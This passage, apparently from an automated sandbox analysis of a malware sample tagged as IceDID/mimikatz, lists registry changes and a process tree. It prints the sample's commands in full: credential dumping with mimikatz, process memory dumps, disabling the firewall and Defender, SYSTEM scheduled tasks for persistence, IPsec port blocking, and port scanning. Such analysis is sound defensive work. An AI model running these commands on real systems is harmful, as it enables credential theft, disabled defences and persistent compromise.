created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tlmneit.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tlmneit.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tlmneit.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tlmneit.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tlmneit.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tlmneit.exe Key created \REGISTRY\USER\.DEFAULT\Software uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing uqgqrabii.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uqgqrabii.exe -
Modifies registry class 14 IoCs
Processes:
tlmneit.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tlmneit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tlmneit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tlmneit.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tlmneit.exepid process 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 672 672 672 672 672 672 672 672 672 672 672 672 672 672 672 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exepid process 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exetlmneit.exetlmneit.exevfshost.exeuqgqrabii.exebubuee.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exeuqgqrabii.exedescription pid process Token: SeDebugPrivilege 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 372 tlmneit.exe Token: SeDebugPrivilege 4784 tlmneit.exe Token: SeDebugPrivilege 1096 vfshost.exe Token: SeDebugPrivilege 372 uqgqrabii.exe Token: SeLockMemoryPrivilege 4288 bubuee.exe Token: SeLockMemoryPrivilege 4288 bubuee.exe Token: SeDebugPrivilege 2164 uqgqrabii.exe Token: SeDebugPrivilege 4960 uqgqrabii.exe Token: SeDebugPrivilege 2328 uqgqrabii.exe Token: SeDebugPrivilege 3472 uqgqrabii.exe Token: SeDebugPrivilege 2584 uqgqrabii.exe Token: SeDebugPrivilege 3796 uqgqrabii.exe Token: SeDebugPrivilege 1768 uqgqrabii.exe Token: SeDebugPrivilege 4896 uqgqrabii.exe Token: SeDebugPrivilege 4924 uqgqrabii.exe Token: SeDebugPrivilege 4360 uqgqrabii.exe Token: SeDebugPrivilege 3308 uqgqrabii.exe Token: SeDebugPrivilege 372 uqgqrabii.exe Token: SeDebugPrivilege 3396 uqgqrabii.exe Token: SeDebugPrivilege 1632 uqgqrabii.exe Token: SeDebugPrivilege 2684 uqgqrabii.exe Token: SeDebugPrivilege 5384 uqgqrabii.exe Token: SeDebugPrivilege 3880 uqgqrabii.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exetlmneit.exetlmneit.exexohudmc.exehmhriy.exetlmneit.exetlmneit.exepid process 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe 372 tlmneit.exe 372 tlmneit.exe 4784 tlmneit.exe 4784 tlmneit.exe 4236 xohudmc.exe 3384 hmhriy.exe 440 tlmneit.exe 440 tlmneit.exe 5544 tlmneit.exe 5544 tlmneit.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.execmd.exetlmneit.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 4472 wrote to memory of 4620 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe cmd.exe PID 4472 wrote to memory of 4620 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe cmd.exe PID 4472 wrote to memory of 4620 4472 2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe cmd.exe PID 4620 wrote to memory of 2696 4620 cmd.exe PING.EXE PID 4620 wrote to memory of 2696 4620 cmd.exe PING.EXE PID 4620 wrote to memory of 2696 4620 cmd.exe PING.EXE PID 4620 wrote to memory of 372 4620 cmd.exe tlmneit.exe PID 4620 wrote to memory of 372 4620 cmd.exe tlmneit.exe PID 4620 wrote to memory of 372 4620 cmd.exe tlmneit.exe PID 4784 wrote to memory of 1196 4784 tlmneit.exe cmd.exe PID 4784 wrote to memory of 1196 4784 tlmneit.exe cmd.exe PID 4784 wrote to memory of 1196 4784 tlmneit.exe cmd.exe PID 1196 wrote to memory of 1928 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 1928 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 1928 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 3984 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 3984 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 3984 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 2332 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 2332 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 2332 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 4024 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 4024 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 4024 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 1504 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 1504 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 1504 1196 cmd.exe cmd.exe PID 1196 wrote to memory of 4412 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 4412 1196 cmd.exe cacls.exe PID 1196 wrote to memory of 4412 1196 cmd.exe cacls.exe PID 4784 wrote to memory of 1200 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 1200 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 1200 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 3352 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 3352 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 3352 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 2956 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 2956 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 2956 4784 tlmneit.exe netsh.exe PID 4784 wrote to memory of 2736 4784 tlmneit.exe cmd.exe PID 4784 wrote to memory of 2736 4784 tlmneit.exe cmd.exe PID 4784 wrote to memory of 2736 4784 tlmneit.exe cmd.exe PID 2736 wrote to memory of 4660 2736 cmd.exe wpcap.exe PID 2736 wrote to memory of 4660 2736 cmd.exe wpcap.exe PID 2736 wrote to memory of 4660 2736 cmd.exe wpcap.exe PID 4660 wrote to memory of 4984 4660 wpcap.exe net.exe PID 4660 wrote to memory of 4984 4660 wpcap.exe net.exe PID 4660 wrote to memory of 4984 4660 wpcap.exe net.exe PID 4984 wrote to memory of 5112 4984 net.exe net1.exe PID 4984 wrote to memory of 5112 4984 net.exe net1.exe PID 4984 wrote to memory of 5112 4984 net.exe net1.exe PID 4660 wrote to memory of 3796 4660 wpcap.exe net.exe PID 4660 wrote to memory of 3796 4660 wpcap.exe net.exe PID 4660 wrote to memory of 3796 4660 wpcap.exe net.exe PID 3796 wrote to memory of 2104 3796 net.exe net1.exe PID 3796 wrote to memory of 2104 3796 net.exe net1.exe PID 3796 wrote to memory of 2104 3796 net.exe net1.exe PID 4660 wrote to memory of 2592 4660 wpcap.exe net.exe PID 4660 wrote to memory of 2592 4660 wpcap.exe net.exe PID 4660 wrote to memory of 2592 4660 wpcap.exe net.exe PID 2592 wrote to memory of 892 2592 net.exe net1.exe PID 2592 wrote to memory of 892 2592 net.exe net1.exe PID 2592 wrote to memory of 892 2592 net.exe net1.exe PID 4660 wrote to memory of 4760 4660 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1732
-
C:\Windows\TEMP\cnzhtbqil\bubuee.exe"C:\Windows\TEMP\cnzhtbqil\bubuee.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
C:\Users\Admin\AppData\Local\Temp\2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-07_74429f8c9da8be6404d2f4b0b33f4933_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lqtiqntg\tlmneit.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2696 -
C:\Windows\lqtiqntg\tlmneit.exeC:\Windows\lqtiqntg\tlmneit.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:372
-
C:\Windows\lqtiqntg\tlmneit.exeC:\Windows\lqtiqntg\tlmneit.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3984
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4024
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1504
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4412
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:1200
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3352
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mqgbuygyl\thanliysa\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\mqgbuygyl\thanliysa\wpcap.exeC:\Windows\mqgbuygyl\thanliysa\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:5112
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2104
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:892
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:2156
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2464
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:952
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1564
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2724
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mqgbuygyl\thanliysa\Scant.txt2⤵PID:4560
-
C:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exeC:\Windows\mqgbuygyl\thanliysa\gbybqbhgt.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\mqgbuygyl\thanliysa\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1200 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mqgbuygyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mqgbuygyl\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2408 -
C:\Windows\mqgbuygyl\Corporate\vfshost.exeC:\Windows\mqgbuygyl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rtttegmpt" /ru system /tr "cmd /c C:\Windows\ime\tlmneit.exe"2⤵PID:4240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2412
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rtttegmpt" /ru system /tr "cmd /c C:\Windows\ime\tlmneit.exe"3⤵
- Creates scheduled task(s)
PID:1556 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltcsllnry" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F"2⤵PID:3876
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ltcsllnry" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lqtiqntg\tlmneit.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4920 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zlnubbstt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F"2⤵PID:4180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4824
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zlnubbstt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cnzhtbqil\bubuee.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2160 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:2524
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:208
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3852
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:380
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:2812
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2356
-
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 804 C:\Windows\TEMP\mqgbuygyl\804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:992
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3572
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:3880
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:4340
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4804
-
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 392 C:\Windows\TEMP\mqgbuygyl\392.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3772
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4868
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:5036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3128
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:3708 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1016
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3228 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2408
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3896
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4240
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4412
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2008
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2464
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4656
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4068 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:4892
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:3996 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:3852
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1576 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4544
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2304 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4236 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 1732 C:\Windows\TEMP\mqgbuygyl\1732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4960 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2504 C:\Windows\TEMP\mqgbuygyl\2504.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2328 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2652 C:\Windows\TEMP\mqgbuygyl\2652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3472 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 2704 C:\Windows\TEMP\mqgbuygyl\2704.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2584 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3168 C:\Windows\TEMP\mqgbuygyl\3168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3796 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3748 C:\Windows\TEMP\mqgbuygyl\3748.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3868 C:\Windows\TEMP\mqgbuygyl\3868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\TEMP\mqgbuygyl\uqgqrabii.exeC:\Windows\TEMP\mqgbuygyl\uqgqrabii.exe -accepteula -mp 3948 C:\Windows\TEMP\mqgbuygyl\3948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4924 -
